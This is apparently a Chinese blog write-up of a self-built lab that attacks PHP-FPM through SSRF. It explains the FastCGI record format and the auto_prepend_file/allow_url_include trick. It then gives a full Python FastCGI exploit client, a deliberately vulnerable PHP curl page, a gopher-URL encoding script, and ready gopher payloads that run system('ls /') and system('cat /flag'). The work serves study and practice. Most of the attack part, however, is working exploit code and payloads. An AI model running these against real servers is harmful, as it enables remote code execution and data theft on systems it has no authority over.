SSRF 攻击PHP-FPM(FastCGI 攻击):学习总结仅供参考
利用条件:
Libcurl版本:高于7.45.0
PHP-FPM:监听端口,版本高于5.3.3
知道目标机器上任意一个php文件绝对路径
一、FastCGI
fastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。
fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi协议由多个record组成,record也有header和body一说,服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端,语言后端解码以后拿到具体数据,进行指定操作,并将结果再按照该协议封装好后返回给服务器中间件。
record的头固定8个字节,body的大小由头部中contentLenght指定(两字节),结构如下
typedef struct {/* Header */unsigned char version; // 版本unsigned char type; // 本次record的类型unsigned char requestIdB1; // 本次record对应的请求idunsigned char requestIdB0;unsigned char contentLengthB1; // body体的大小unsigned char contentLengthB0;unsigned char paddingLength; // 额外块大小unsigned char reserved; //保留字段/* Body */unsigned char contentData[contentLength]; //body内容数据unsigned char paddingData[paddingLength]; //填充数据
} FCGI_Record;
type字段选项
enum FCGI_Type {FCGI_BEGIN_REQUEST = 1, // (WEB->FastCGI) 表示一次请求的开始FCGI_ABORT_REQUEST = 2, // (WEB->FastCGI) 表示终止一次请求FCGI_END_REQUEST = 3, // (FastCGI->WEB) 请求已被处理完毕FCGI_PARAMS = 4, // (WEB->FastCGI) 表示一个向CGI程序传递的环境变量FCGI_STDIN = 5, // (WEB->FastCGI) 表示向CGI程序传递的标准输入FCGI_STDOUT = 6, // (FastCGI->WEB) 表示CGI程序的标准输出 FCGI_STDERR = 7, // (FastCGI->WEB) 表示CGI程序的标准错误输出FCGI_DATA = 8, // (WEB->FastCGI) 向CGI程序传递的额外数据FCGI_GET_VALUES = 9, // (WEB->FastCGI) 向FastCGI程序询问一些环境变量FCGI_GET_VALUES_RESULT = 10, // (FastCGI->WEB) 询问环境变量的结果FCGI_UNKNOWN_TYPE = 11 // 未知类型,可能用作拓展
};
二、PHP-FPM
FastCGI是一个协议,PHP-FPM是实现了FastCGI协议的程序,全称PHP FastCGI Process Manager 即PHP FastCGI的进程管理器,运行在默认运行在9000端口。
现在知道服务器中间件与PHP_FPM使用FastCGI通信,那么我们可以伪造FastCGI协议包与PHP-FPM通信实现任意代码执行。FastCGI中只能传输配置信息,可以更改配置信息来实现任意代码执行。
在php.ini中有如下两个配置项:
auto_prepend_file:在执行目标文件前,先包含其指定的文件,其可以使用伪协议如:php://input.
auto_append_file: 在执行目标文件后,包含其指向的文件
php://input:客户端HTTP请求中POST原始数据
如果设置 auto_prepend_file=php://input 那么每个文件执行前会包含HTTP请求中的POST数据,但php://input需要开启 allow_url_include:On,可以通过FastCGI中的PHP_ADMIN_VALUE选项修如:PHP_ADMIN_VALUE:allow_url_include:On
三、编写EXP(代码来自大佬)
import socket
import random
import argparse
import sys
from io import BytesIO# Referrer: https://github.com/wuyunfeng/Python-FastCGI-ClientPY2 = True if sys.version_info.major == 2 else False #判断python 版本def bchr(i):if PY2:return force_bytes(chr(i))else:return bytes([i])def bord(c):if isinstance(c, int):return celse:return ord(c)def force_bytes(s):if isinstance(s, bytes):return selse:return s.encode('utf-8', 'strict')def force_text(s):if issubclass(type(s), str):return sif isinstance(s, bytes):s = str(s, 'utf-8', 'strict')else:s = str(s)return sclass FastCGIClient:"""A Fast-CGI Client for Python"""# private__FCGI_VERSION = 1__FCGI_ROLE_RESPONDER = 1__FCGI_ROLE_AUTHORIZER = 2__FCGI_ROLE_FILTER = 3__FCGI_TYPE_BEGIN = 1__FCGI_TYPE_ABORT = 2__FCGI_TYPE_END = 3__FCGI_TYPE_PARAMS = 4__FCGI_TYPE_STDIN = 5__FCGI_TYPE_STDOUT = 6__FCGI_TYPE_STDERR = 7__FCGI_TYPE_DATA = 8__FCGI_TYPE_GETVALUES = 9__FCGI_TYPE_GETVALUES_RESULT = 10__FCGI_TYPE_UNKOWNTYPE = 11__FCGI_HEADER_SIZE = 8# request stateFCGI_STATE_SEND = 1FCGI_STATE_ERROR = 2FCGI_STATE_SUCCESS = 3def __init__(self, host, port, timeout, keepalive):self.host = hostself.port = portself.timeout = timeoutif keepalive:self.keepalive = 1else:self.keepalive = 0self.sock = Noneself.requests = dict()def __connect(self):self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)self.sock.settimeout(self.timeout)self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)# if self.keepalive:# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)# else:# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)try:self.sock.connect((self.host, int(self.port)))except socket.error as msg:self.sock.close()self.sock = Noneprint(repr(msg))return Falsereturn Truedef __encodeFastCGIRecord(self, fcgi_type, content, requestid):length = len(content)buf = bchr(FastCGIClient.__FCGI_VERSION) \+ bchr(fcgi_type) \+ bchr((requestid >> 8) & 0xFF) \+ bchr(requestid & 0xFF) \+ bchr((length >> 8) & 0xFF) \+ bchr(length & 0xFF) \+ bchr(0) \+ bchr(0) \+ contentreturn bufdef __encodeNameValueParams(self, name, value):nLen = len(name)vLen = len(value)record = b''if nLen < 128:record += bchr(nLen)else:record += bchr((nLen >> 24) | 0x80) \+ bchr((nLen >> 16) & 0xFF) \+ bchr((nLen >> 8) & 0xFF) \+ bchr(nLen & 0xFF)if vLen < 128:record += bchr(vLen)else:record += bchr((vLen >> 24) | 0x80) \+ bchr((vLen >> 16) & 0xFF) \+ bchr((vLen >> 8) & 0xFF) \+ bchr(vLen & 0xFF)return record + name + valuedef __decodeFastCGIHeader(self, stream):header = dict()header['version'] = bord(stream[0])header['type'] = bord(stream[1])header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])header['paddingLength'] = bord(stream[6])header['reserved'] = bord(stream[7])return headerdef __decodeFastCGIRecord(self, buffer):header = buffer.read(int(self.__FCGI_HEADER_SIZE))if not header:return Falseelse:record = self.__decodeFastCGIHeader(header)record['content'] = b''if 'contentLength' in record.keys():contentLength = int(record['contentLength'])record['content'] += buffer.read(contentLength)if 'paddingLength' in record.keys():skiped = buffer.read(int(record['paddingLength']))return recorddef request(self, nameValuePairs={}, post=''):if not self.__connect():print('connect failure! please check your fasctcgi-server !!')returnrequestId = random.randint(1, (1 << 16) - 1) # 1 --65535self.requests[requestId] = dict()request = b""beginFCGIRecordContent = bchr(0) \+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \+ bchr(self.keepalive) \+ bchr(0) * 5request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,beginFCGIRecordContent, requestId)paramsRecord = b''if nameValuePairs:for (name, value) in nameValuePairs.items():name = force_bytes(name)value = force_bytes(value)paramsRecord += self.__encodeNameValueParams(name, value)if paramsRecord:request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)if post:request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)self.sock.send(request)self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SENDself.requests[requestId]['response'] = b''return self.__waitForResponse(requestId)def __waitForResponse(self, requestId):data = b''while True:buf = self.sock.recv(512)if not len(buf):breakdata += bufdata = BytesIO(data)while True:response = self.__decodeFastCGIRecord(data)if not response:breakif response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:self.requests['state'] = FastCGIClient.FCGI_STATE_ERRORif requestId == int(response['requestId']):self.requests[requestId]['response'] += response['content']if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:self.requests[requestId]return self.requests[requestId]['response']def __repr__(self):return "fastcgi connect host:{} port:{}".format(self.host, self.port)if __name__ == '__main__':parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')parser.add_argument('host', help='Target host, such as 127.0.0.1')parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)args = parser.parse_args()client = FastCGIClient(args.host, args.port, 3, 0)params = dict()documentRoot = "/"uri = args.filecontent = args.codeparams = {'GATEWAY_INTERFACE': 'FastCGI/1.0','REQUEST_METHOD': 'POST','SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),'SCRIPT_NAME': uri,'QUERY_STRING': '','REQUEST_URI': uri,'DOCUMENT_ROOT': documentRoot,'SERVER_SOFTWARE': 'php/fcgiclient','REMOTE_ADDR': '127.0.0.1','REMOTE_PORT': '9985','SERVER_ADDR': '127.0.0.1','SERVER_PORT': '80','SERVER_NAME': "localhost",'SERVER_PROTOCOL': 'HTTP/1.1','CONTENT_TYPE': 'application/text','CONTENT_LENGTH': "%d" % len(content),'PHP_VALUE': 'auto_prepend_file = php://input','PHP_ADMIN_VALUE': 'allow_url_include = On'}response = client.request(params, content)print(force_text(response))
四、实验靶场搭建
1、环境准备
腾讯云服务器:ubuntu
nginx php-fpm(7.4) Libcurl(7.74)
php-fpm监听9000端口,nginx将php义务转发自9000端口
php扩展curl模块 (apt-getinstall php7-fpm)
php.ini中导入curl.so配置:
2、建一存在ssrf漏洞的站点:
<?php$url=$_GET['url'];
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);
$res=curl_exec($ch);
curl_close($ch);?>
输入网址:http://ip/index.php?url=www.baidu.com 验证站点
3、在根目录下放flag文件
五、攻击练习
伪造FastCGI数据:
利用大佬写好的脚本运行
python fpm.py -c "<?php system('ls /');?>" -p 12345 127.0.0.1 /var/www/html/index.php
另一边监听端口得到数据
xxd 查看数据
将数据url两次编码:
利用脚本
# -*- coding: UTF-8 -*-
from urllib.parse import quote, unquote, urlencode
file= open('1.txt','rb')
payload= file.read()
payload= quote(payload).replace("%0A","%0A%0D")
print("gopher://127.0.0.1:9000/_"+quote(payload))
得到gopher数据
gopher://127.0.0.1:9000/_%2501%2501P%25A8%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504P%25A8%2501%25DB%2500%2500%250E%2502CONTENT_LENGTH23%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%2517REQUEST_URI/var/www/html/index.php%2501%2504P%25A8%2500%2500%2500%2500%2501%2505P%25A8%2500%2517%2500%2500%253C%253Fphp%2520system%2528%2527ls%2520/%2527%2529%253B%253F%253E%2501%2505P%25A8%2500%2500%2500%2500
在浏览器通过ssrf漏洞站点将数据打入 成功爆出根目录 发现falg 文件
现在同样伪造数据将falg文件内容爆出
python fpm.py -c "<?php system('cat /falg');?>" -p 12345 127.0.0.1 /var/www/html/index.php
得到数据
gopher://127.0.0.1:9000/_%2501%2501%2518.%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2518.%2501%25DB%2500%2500%250E%2502CONTENT_LENGTH28%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%2517REQUEST_URI/var/www/html/index.php%2501%2504%2518.%2500%2500%2500%2500%2501%2505%2518.%2500%251C%2500%2500%253C%253Fphp%2520system%2528%2527cat%2520/flag%2527%2529%253B%253F%253E%2501%2505%2518.%2500%2500%2500%2500
成功爆出flag
SSRF 攻击PHP-FPM(FastCGI 攻击):学习总结仅供参考相关推荐
- 教你如何使用android studio 4.0发布release 版本 学习记录 仅供参考
教你如何使用android studio 4.0发布release 版本 学习记录 仅供参考 这是老师给我们布置的任务,我在这里做一个简单的总结,话不多说,直接上图上步骤吧 首先,在菜单栏中,点击 B ...
- opengl光照效果的三棱锥+键盘上下左右控制旋转(学习笔记-仅供参考)
#include <windows.h> #include <gl/gl.h> #include <gl/glut.h> #include<stdio.h&g ...
- hive学习(仅供参考)
hive搭建 Hive 什么是hive Hive的优势和特点 hive搭建 解压.改名 修改环境变量 添加hive-site.xml 将maven架包拷贝到hive 替换一下gua包 使环境变量生效 ...
- opengl 观察变换与投影变化 水壶 (学习笔记-仅供参考)
#include <GL/glut.h> #include <stdlib.h>void display(void) {glClearColor(0.0, 0.0, 0.0, ...
- MySQL个人学习笔记-仅供参考
简介 数据库的作用:数据存储 数据库本质上就是个文件系统,而且存储的数据可以实现持久化存储 DBS:->数据库系统:由数据库.数据库管理员.数据库管理系统构成 DBMS:->数据库管理系统 ...
- RewriteCond指令格式(个人学习笔记仅供参考)
RewriteBase指令显式地设置了目录级重写的基准URL. RewriteCond指令格式 [说明]定义重写发生的条件 [语法]RewriteCond TestString CondPattern ...
- 单链表操作2-单链表A拆分成奇数和偶数值单链表B和C(个人学习笔记,仅供参考)
单链表A拆分成奇数和偶数值单链表B和C 题目要求 单链表结点定义 函数接口定义 测试程序样例 输入样例 输出样例 答案 题目要求 在一个带头结点的单链表A中,头指针为a,设计算法SplitList ( ...
- 单链表操作10-带头结点的单链表逆置(个人学习笔记,仅供参考)
带头结点的单链表逆置 题目要求 单链表结点定义 函数接口定义 测试程序样例 输入样例 输出样例 答案 题目要求 设计算法Reverse( ),将带头结点的单链表A逆置,要求利用原有链表的链点,最后输出 ...
- APT攻击 --- 个人理解,仅供参考
APT攻击是一个集合了多种常见攻击方式的综合攻击.综合多种攻击途径来尝试突破网络防御,通常是通过Web或电子邮件传递,利用应用程序或操作系统的漏洞,利用传统的网络保护机制无法提供统一的防御.除了使用多 ...
最新文章
- [luogu5004]专心OI - 跳房子【矩阵加速+动态规划】
- 7.2.3 使用RenderTargetBitmap类生成图片
- webpack从入门到精通(二)开发环境的基本配置
- 【SRH】------常见的HTTP状态码
- c# SQL CLR 之一
- 基于决策树的多分类_R中基于决策树的糖尿病分类—一个零博客
- groovy 字符串截取最后一个_Python入门高级教程--Python 字符串
- fabric canvas 清空并重置画布
- ViewGroup之getScrollX()
- 使用Windows Server 2003搭建一个asp+access网站
- 对象当前正在其他地方使用_2019 为什么我们还会继续使用 PHP ?
- C++实现大顶堆(插入,删除)
- 使cmd窗口不自动关闭
- 用EasyRecovery恢复手残误删的文件
- PS和AE、PR的区别是什么?
- Python使用APP Inventor网络微数据库TinyWebDB
- SKYPE的BUG 7/8
- 多线程开发实战:Java实现多线程四种方式及相关方法原理
- ffmpeg分离视频音频流
- sigmaster解码播放